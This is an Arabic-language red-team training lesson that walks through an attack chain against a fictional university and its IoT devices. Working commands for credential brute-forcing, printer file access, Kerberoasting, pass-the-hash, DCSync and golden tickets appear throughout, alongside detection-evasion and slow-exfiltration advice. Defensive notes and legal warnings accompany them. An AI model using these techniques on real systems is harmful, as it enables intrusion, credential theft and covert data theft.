Cyber Operations Academy logo
أكاديمية العمليات السيبرانية
Red / Blue / Ops
الرئيسية/الدروس/L78
الفرق الحمراء — الهجومخبير150mL78

University Attack Chain — هجوم A-to-Z على جامعة و IoT

من Recon لسيطرة كاملة، عبر كاميرات وطابعات وقارئات بطاقات

#Kill Chain#University#IoT#Cameras#Printers#Pivot

السيناريو — جامعة state-uni.edu

طب ليه الجامعات بالظبط؟ ليه مش بنوك؟ ليه مش جيش؟

بنوك عندهم security teams وعندهم تنظيم وعندهم compliance.

الجيش عنده شبكات مقسّمة وعنده classification.

الجامعة؟

شبكات "مفتوحة بطبيعتها" (الثقافة الأكاديمية اللي مش بتقبل قيود).

آلاف لابتوبات طلبة + عشرات الآلاف IoT (كاميرات، طابعات، badge readers).

أبحاث ممولة من DARPA و NIH (الجواهر الحقيقية).

فريق IT أربعة أنفار بميزانية شركة صغيرة.

الجامعة ده "أرخى نقطة في المنظومة" ومعاها في نفس الوقت "أعلى قيمة استخباراتية". ولكل APT محترمة عندها حملة جامعية موثّقة: Cozy Bear (روسيا)، TA413 (الصين)، Charming Kitten (إيران).

الدرس ده هيلمّ كل اللي اتعلمته في "فيلم" واحد كامل. الهدف: state-uni.edu (وهمية، RFC 2606). إحنا فريق أحمر معانا تفويض مكتوب نقيّم: نظام التسجيل، شبكة الكاميرات، الطابعات الإدارية، قارئات البطاقات. المدة 6 أسابيع. النطاق: 203.0.113.0/24 و 198.51.100.0/24 (RFC 5737).

تشبيه — شرح مبسط
الجامعة زي مجمّع سكني كبير محدش بيقفل بابه. إنت داخل من الباب الرئيسي زي أي حد، وكل ما تفتح أوضة، تلاقي مفتاح للأوضة اللي جنبها على الترابيزة. حتى لما توصل لخزينة الرئيس، الخزينة ماتقفلش — هي بس "مغلقة بسلسلة".
وإنت ماسك المقص.
غلطات الـ junior في pentest الجامعة
  • بيبدأ Active scanning من اليوم الأول. أول port scan كبير = الـ NetFlow بيشوفه. اتحرقت قبل ما تبدأ.
  • بينسى الـ IoT. الكاميرا بتاعت "الأمن" هي اللي بتشوف Domain Controller.
  • بيستخدم Cobalt Strike default. أي EDR محترم بيمسكه.
  • بيعمل DCSync ساعة 11 الصبح والكل شغّال. قعد تعمله الفجر يوم جمعة.
  • بيخرج 50GB من البيانات في ساعة. أي SIEM شاطر بيرفع إنذار. لو إنت في الجامعة، 5GB كل يوم على OneDrive بتاع الجامعة نفسها = شرعي 100%.
حدود قانونية — ركّز هنا قبل ما تكمل
كل خطوة في الدرس ده قانونية بس على الهدف الوهمي أو على جامعة وقّعت عقد pentest. تجرب أي تكنيك من دول على شبكة جامعتك الفعلية من غير تفويض = جناية CFAA + احتمال طرد + حظر مدى الحياة من أي شغل فيدرالي. بلاش عك.

خريطة السلسلة الكاملة (A → Z)

A. Recon — الاستطلاع السلبي
OSINT، subdomains، LinkedIn للموظفين، شودان للأجهزة المعرّضة.
B. Active scanning
Nmap، Nuclei، فحص بنية AD وSSO.
C. Initial access
Phishing لطالب/موظف، أو ثغرة ويب على بوابة التسجيل.
D. Foothold
Webshell، أو دخول VPN بكلمة سر مسرّبة.
E. Internal recon
BloodHound على AD، رسم الـ subnets الداخلية.
F. IoT pivot
كاميرات + طابعات = نقاط استمرار جديدة.
G. Privilege escalation
Kerberoasting، NTLM relay، LAPS misconfig.
H. Lateral movement
PsExec، WinRM، عبر VLANs ضعيفة العزل.
I. Domain dominance
DCSync على Domain Controller.
J. Crown jewels
نظام التسجيل، قاعدة بيانات الأبحاث، خوادم البريد.
K-Y. Persistence + exfil
Golden ticket، scheduled tasks، استخراج بطيء.
Z. Cleanup + report
إزالة آثار، تقرير كامل للعميل، توصيات.

A — الاستطلاع السلبي (الأسبوع 1)

القاعدة المقدسة هنا: ولا packet واحد يروح ناحية state-uni.edu في المرحلة دي. كل اللي هتجمعه من مصادر تالتة. لو عطست في وش الهدف من بدري، كل اللي بعد كده هيكون محروق.

$ # subdomains من شهادات SSL العامة:
$ curl -s 'https://crt.sh/?q=%25.state-uni.edu&output=json' | jq -r '.[].name_value' | sort -u
registrar.state-uni.edu library.state-uni.edu vpn.state-uni.edu cameras.state-uni.edu print-srv.state-uni.edu badge.state-uni.edu
$ # Shodan لأجهزة الجامعة المعرّضة (يحتاج اشتراك):
$ shodan search 'org:"State University" port:554' # RTSP cameras
$ shodan search 'org:"State University" port:631' # IPP printers
$ shodan search 'org:"State University" port:9100' # Raw print
$ # LinkedIn للموظفين — أسماء IT/إداريين بصلاحيات عالية:
$ # (يدوي عبر Sales Navigator أو theHarvester)
$ theHarvester -d state-uni.edu -b linkedin,bing,duckduckgo
الحماية — تقليل سطح الـ OSINT
  • إزالة شعار الجامعة من Shodan (bug bounty لقطات منه).
  • سياسة LinkedIn للموظفين: لا تُنشر سلطات تقنية محددة.
  • مراقبة crt.sh الخاص بنطاقك — كل شهادة جديدة = تنبيه لـ SOC.
  • Continuous Attack Surface Management (ASM): أدوات مثل Censys, runZero ترى ما يراه المهاجم.

B — الفحص النشط (نهاية الأسبوع 1)

bash
# 1) فحص شامل لكل المنافذ على نطاقات الجامعة:
nmap -sS -p- --min-rate 5000 -oA full-scan 203.0.113.0/24

# 2) تحديد الخدمات والإصدارات لكل ميناء مفتوح:
nmap -sV -sC -p 22,80,443,445,554,631,3389,5985,8080 -oA service-scan 203.0.113.0/24

# 3) Nuclei لـ CVEs معروفة:
nuclei -l live-hosts.txt -t cves/ -severity critical,high -o nuclei-results.txt

# 4) BBOT لـ recon آلي شامل:
bbot -t state-uni.edu -f passive,subdomain-enum,web-basic

على هدف عك، اللي بتلاقيه كله نمطي: VPN قديم (Pulse/Fortinet/Citrix على CVE معروف)، Outlook Web Access مفتوح للدنيا، Confluence/Jira داخلية ماشية على الإنترنت زي العسل، وكاميرات IP من غير authentication. كل ده مش "لو"، ده "كم واحد منهم".

C — الوصول الأولي (Initial Access)

3 سكك أساسية بتشتغل على بيئة جامعية. اختار اللي يناسب الهدف:

01
Phishing لطالب أو موظف

طالب جديد + صفحة دخول مزيفة لـ "portal.state-uni.edu" مستضافة على portal-state-uni.edu (شرطة بدل النقطة، حد بياخد باله؟ لأ) = 30%+ click rate في الحملات الحقيقية. EvilGinx2 أو Modlishka بيمسكوا الجلسة بعد الـ MFA كله (AiTM).

02
ثغرة ويب على بوابة التسجيل

أنظمة التسجيل (Banner, PeopleSoft Campus, Workday Student) دايماً فيها custom code قديم كاتبه شخص خرج من شغله من 5 سنين. SQLi على نموذج بحث الطلبة → تسحب hashes → تدخل بأي حساب تحبه.

03
VPN بـ password spraying

السكة دي بتشتغل تقريباً دايماً: لستة أسماء من LinkedIn + باسورد موسمي زي (Spring2026!). من 3 لـ 7% من الموظفين بيحطوا حاجة شبهها. SprayingToolkit ضد OWA أو VPN gateway وخلاص.

الحماية
  • MFA إجباري + FIDO2 keys لـ admins (يقاوم phishing).
  • Conditional Access: refuse logins from non-corporate IPs without device compliance.
  • Lockout بعد 5 محاولات + جدار حماية لـ IPs غير معتادة.
  • تدريب phishing شهري + تقارير سهلة ("Report Phish" زر في Outlook).

D — موطئ القدم

دخلنا. عندنا دلوقتي session على workstation موظف في "مكتب التسجيل". الهدف الحالي: نثبت قدمنا من غير ما حد ياخد بالنا. الـ OPSEC دلوقتي أهم من السرعة.

  • متنزلش أي binary على الجهاز. اشتغل بـ PowerShell + WMI الأصلية اللي موجودة.
  • اقعد ساعة بس تتفرج على المستخدم: بيفتح إيه؟ إمتى؟ ده هو "التوقيع الطبيعي" اللي إحنا هنقلّده.
  • حط نفسك كـ scheduled task بيشتغل عند login بس (مش boot — ده أوضح بكتير).

E — استطلاع داخلي + BloodHound

دي لحظة الذهب: الـ AD مفتوحة قدامك زي الكتاب. BloodHound + SharpHound بيرسموا كل علاقة بين كل حساب وكل جهاز:

$ # جمع بيانات AD من workstation موظف عادي:
$ SharpHound.exe -c All --zipfilename uni-data.zip
$ # في BloodHound GUI، استعلامات ذهبية:
$ # 1) أقصر مسار من "Domain Users" إلى "Domain Admins"
$ # 2) كل user مع SPN (هدف Kerberoasting)
$ # 3) أجهزة بـ "Unconstrained Delegation"
$ # 4) GPOs قابلة للتعديل من حسابي

على شبكة جامعية متوسطة، BloodHound بيكشف عادة من 3 لـ 5 مسارات تودّيك Domain Admin في دقايق. السبب؟ service accounts قديمة من زمن نوح، delegation متظبط بالعك، ومجموعات متراكمة فوق بعض ومحدش بيراجعها.

F — التحوّل عبر IoT — كاميرات وطابعات

هنا الجزء الممتع. هو إحنا بنروح ناحية الـ IoT ليه أصلاً؟ بسيطة: (1) مفيش EDR عليها، خالص. (2) باسوردات افتراضية في كل مكان. (3) محدش بيحدّث firmware من تاريخ التركيب. (4) مربوطة على VLANs "داخلية" أعمق من الـ workstations نفسها. يعني نقطة دخول رخيصة ومخفية.

الكاميرات IP — التقاط، إنكار، نقطة استمرار

bash
# 1) اكتشاف كاميرات RTSP في شبكة الجامعة:
nmap -p 554,8554,80,8080 --script rtsp-url-brute 198.51.100.0/24

# 2) تجربة بيانات اعتماد افتراضية (Hikvision/Dahua/Axis):
hydra -L users.txt -P common-camera-pass.txt 198.51.100.42 rtsp
# users.txt: admin, root, service, supervisor
# common: admin, 12345, password, hikvision, dahua, root

# 3) ffmpeg لقراءة البث المباشر:
ffmpeg -i rtsp://admin:admin@198.51.100.42:554/Streaming/Channels/101 -t 30 sample.mp4

أهم CVEs على كاميرات الحرم الجامعي (تاريخياً):

  • CVE-2017-7921 (Hikvision) — تجاوز مصادقة بمجرد إضافة ?auth=YWRtaW46MTEK.
  • CVE-2021-36260 (Hikvision) — RCE بدون مصادقة. أعطى Mirai-variants سيطرة على ملايين الكاميرات.
  • CVE-2022-30563 (Dahua) — تجاوز مصادقة عبر إعادة تشغيل ONVIF.

الكاميرا قيمة جداً كـ persistence ليه؟ هي جوها Linux صغير شغال على ARM، تقدر تركّب فيها implant دايم في الـ firmware نفسه. مفيش EDR. بتعيش سنين من غير ما حد يبص ناحيتها. APTs أمريكية وصينية موثّق استخدامها للكاميرات كـ "صناديق سودا" على شبكات الأهداف.

الطابعات — أكتر هدف الناس بتستهتر بيه على الشبكة

الطابعات MFP (Xerox, HP, Canon, Konica) دي مش طابعات، دي أجهزة Linux كاملة. بتخزّن: نسخ من كل مستند اتمسح فيها، LDAP credentials علشان تشتغل "Print Anywhere"، وKerberos tickets. تخيل الكنز اللي جواها.

bash
# 1) PRET — Printer Exploitation Toolkit (open source)
pip install colorama
git clone https://github.com/RUB-NDS/PRET && cd PRET
python pret.py 198.51.100.50 ps   # عبر PostScript

# داخل shell PRET:
ls /                    # تصفح ملفات الطابعة
cat /home/printer/jobs  # قد يحوي مستندات سابقة!
get /etc/passwd

# 2) IPP exploit — أحياناً RCE بدون مصادقة:
nmap -p 631 --script ipp-info 198.51.100.0/24

# 3) Print job capture — تنصّت على ما يطبعه الناس:
# (في مختبر): اعتراض port 9100 و حفظ الـ PostScript

الطابعة مهمة ليه بالظبط؟

  • جواها LDAP bind credentials علشان توصل لـ address book — مربوطة بـ domain account حقيقي. تسرقها = عندك حساب AD سليم.
  • الطابعة بتاعت "مكتب الرئيس" طبعت النسخة الأصلية من كل ورقة سرية في الجامعة. الذاكرة الداخلية بتحتفظ بالنسخ.
  • PrintNightmare (CVE-2021-34527) ضد الـ Print Spooler بيحوّل أي domain user لـ SYSTEM على الـ DC نفسه. ثغرة بتاعتها واحدة فاتحة سكة الكنز.

قارئات البطاقات والتحكم بالأبواب

أنظمة Lenel, Genetec, HID Global. غالباً MSSQL في الخلفية + شبكة منفصلة، بس دايماً بيوصلوها بـ corporate علشان "سهولة الإدارة". والعك يبدأ من هنا.

  • HID iCLASS / Prox قابلة للنسخ بـ Proxmark3 ($300) في 5 ثوان. اختبار في غرفة الأسانسير (المصعد)، تستنسخ بطاقة موظف، تدخل أي مكان.
  • قواعد بيانات Lenel فيها كثيراً sa بكلمة سر افتراضية.
  • API الـ Genetec أحياناً مفتوح على الشبكة الداخلية بدون مصادقة كافية → فتح أي باب عن بُعد.

أجهزة عرض VoIP وSmart TVs والمختبرات

  • هواتف Cisco/Polycom: lots of CVEs قديمة، telnet مفتوح أحياناً، يمكن تحويلها لـ "ميكروفون" دائم.
  • أجهزة عرض ذكية: Android قديم جداً، WiFi مفتوح، يمكن استخدامها كـ pivot box.
  • أنظمة BMS (مكيفات، إضاءة): BACnet بدون authentication. ليست مفيدة هجومياً مباشرة، لكنها "شبكة موازية" تتجاوز firewall أحياناً.
الحماية — على IoT
  • VLAN segmentation صارمة: كاميرات وطابعات وBMS كل واحد في VLAN منفصل، لا تتكلم مع corporate إلا عبر firewall بقواعد محددة.
  • تغيير افتراضات قبل التركيب — كلمة سر، شهادة، SNMP community.
  • Firmware updates روتينية — أكثر الكاميرات/الطابعات لا تُحدّث منذ التركيب.
  • NAC (802.1X) حتى للأجهزة — كاميرا غير مسجلة لا تحصل على IP.
  • Network detection لـ traffic غريب من IoT (كاميرا تتكلم بـ DNS لنطاقات خارجية = أحمر).
  • Asset inventory دقيق — كم كاميرا لديك؟ كم طابعة؟ بدون رقم، لا تحمي.

G — رفع الصلاحيات — Kerberoasting

أسهل سكة على شبكة جامعية: service accounts (SPN) باسوردها قديمة من أيام الجامعة الأولانية، محدش غيّرها.

bash
# 1) قائمة كل حسابات SPN:
GetUserSPNs.py state-uni.edu/student.user:Pass123 -dc-ip 203.0.113.10 -request

# 2) النتيجة: TGS tickets قابلة للكسر offline:
hashcat -m 13100 spn-hashes.txt rockyou.txt -r best64.rule

# 3) كلمة سر "Library2019!" لحساب "sql_svc" → MSSQL admin → xp_cmdshell → SYSTEM
الحماية
  • كلمات سر طويلة (25+ حرف) لكل حساب SPN.
  • Group Managed Service Accounts (gMSA) — Windows يدير الكلمة آلياً.
  • Honeytokens: حساب SPN فخّ لا يستخدمه أحد، أي طلب TGS له = APT داخل.

H — التحرك الجانبي عبر VLANs

الجامعات "مفتوحة" بطبعها، فالـ VLAN segmentation عندهم ضعيف. workstation الموظف بيكلم printer admin VLAN، اللي بيكلم camera VLAN. كل قفزة بنستخدم فيها credential جديد جمعناه من الطبقة اللي قبلها — زي السلم.

$ # Pass-the-hash من workstation إلى print server:
$ psexec.py -hashes :aad3b...:31d6cf... administrator@198.51.100.50
$ # WinRM إلى file server:
$ evil-winrm -i 198.51.100.60 -u svc_backup -H 4f3d...

I — السيطرة على النطاق (Domain Dominance)

بعد ما وصلنا لـ Domain Admin (سواء عن طريق Kerberoasting أو NTLM relay على PetitPotam) — دلوقتي إحنا بنلعب باللعبة كلها:

bash
# DCSync — استخراج كل hashes النطاق من DC:
secretsdump.py state-uni.edu/admin@dc01.state-uni.edu -just-dc

# النتيجة: hashes كل حساب، بما فيها حساب krbtgt (the keys to the kingdom).
# Golden Ticket = استمرار حتى لو غيّر admin كلمته:
ticketer.py -nthash <krbtgt-hash> -domain-sid <SID> -domain state-uni.edu admin
الحماية — الذي يعمل فعلاً
  • Tier 0/1/2 isolation: Domain Admin لا يسجّل دخول إلا على DC.
  • تدوير hash krbtgt مرتين سنوياً (يبطل golden tickets قديمة).
  • Microsoft LAPS + Privileged Access Management (PAM).
  • Defender for Identity يصطاد DCSync بدقة عالية.

J — الجواهر — الأهداف الحقيقية في جامعة

  1. Banner / PeopleSoft — قاعدة بيانات الطلاب: أسماء، SSN، MFAs، شهادات.
  2. Research data — أبحاث ممولة فيدرالياً (DARPA, DoE, NIH). الجواهر الحقيقية للـ APT.
  3. Financial systems — رواتب، منح، payroll redirects.
  4. Email (Exchange/M365) — كل شيء يمر هنا. صلاحيات admin تعطي impersonation.
  5. Lab networks — أحياناً ICS صغير (مفاعلات تعليمية، biosafety labs). أعلى حساسية.

K → Y — الاستمرار والاستخراج

  • Persistence: Golden ticket + scheduled task + WMI subscription + webshell على بوابة فرعية.
  • Tiered access: 3 طبقات منفصلة كما في درس web-vuln-research.
  • Exfil: لا تخرج 50GB دفعة واحدة. Rclone إلى حساب OneDrive للجامعة نفسها (يبدو شرعياً) بمعدل 5GB/يوم على مدى أسابيع.
  • Beacons داخل ساعات عمل الحرم فقط، عبر domain fronting لـ Cloudflare/Azure.

Z — التنظيف وتقرير العميل

  • إزالة كل الأدوات المؤقتة (لكن احتفظ بـ logs لتسليم العميل).
  • إعادة كلمات السر التي عدّلتها لقيم سابقة (لا تكسر الإنتاج).
  • تقرير: timeline دقيق، كل CVE، كل خطأ تكوين، كل كلمة سر ضعيفة، كل IoT مكشوف.
  • توصيات بأولويات: ما يجب إصلاحه في أسبوع، شهر، ربع.
  • retest بعد الإصلاحات (بعد 90 يوماً عادة).

MITRE ATT&CK Mapping للسلسلة كاملة

text
Recon:        T1595 (Active Scanning), T1589 (Gather Victim Identity)
Initial:      T1566.001 (Spearphishing), T1190 (Public-Facing Exploit), T1110.003 (Spraying)
Execution:    T1059.001 (PowerShell), T1059.003 (Cmd)
Persistence:  T1053.005 (Scheduled Task), T1505.003 (Webshell), T1136 (New Account)
Priv Esc:     T1558.003 (Kerberoasting), T1068 (Exploitation for Priv Esc)
Defense Evd:  T1027 (Obfuscation), T1070.004 (File Deletion)
Credentials:  T1003.001 (LSASS), T1003.006 (DCSync)
Discovery:    T1018 (Remote System), T1087 (Account Discovery)
Lateral:      T1021.002 (SMB), T1021.006 (WinRM), T1550.002 (PtH)
Collection:   T1005 (Local Data), T1213 (Internal Repo)
C2:           T1071.001 (Web), T1090 (Proxy), T1568 (Dynamic Resolution)
Exfil:        T1567.002 (Cloud Storage), T1041 (Over C2)
Impact:       T1486 (Encrypt) — لا في تدريب، فقط documentation

حالات حقيقية للدراسة

  • UC San Diego / UCSF (2020) — ransomware عبر phishing → DCSync → تشفير.
  • Newcastle University (2020) — DoppelPaymer، 6 أشهر استرداد.
  • MIT lab pivot via printer (2017) — الباحثون أظهروا hop من طابعة Konica إلى DC.
  • IoT botnet Mirai (2016) — كاميرات Hikvision في حرم جامعي شاركت في DDoS.
  • Operation Newscaster (Charming Kitten) — phishing لباحثين أكاديميين أمريكيين موثّق منذ 2014.

الخلاصة الناشفة

الـ pentest على جامعة مش "شغل تقني". هو امتحان للـ OPSEC بتاعك أنت قبل ما يكون امتحان للـ infra بتاعتها هي.

كل خطوة بتعملها بسرعة = خطوة بتزود فيها فرصة إنك تتحرق.

كل خطوة بتعملها بمنطق "ليه دلوقتي؟ ومين هيشوف؟ وإيه الـ noise؟" = خطوة بتقرّبك من النهاية بأمان.

الجامعة هتنكشف. السؤال هي إنت اللي هتسلّم تقريرها بنفسك بعد 6 أسابيع، ولا الـ FBI هيسلّمه لك في تهمة CFAA؟

اكتبها على الحيطة اللي في وش السرير:

الفرق بين الاتنين هو "التفويض المكتوب". مفيش حاجة تانية. مفيش "بس عشان أتعلّم".

ده بزنس يا نجم.. بزنس.

السابق
Ransomware — تشريح الهجوم بدل ما تخاف منه
الوحدة التالية
ICS/SCADA — Modbus و DNP3 و IEC-104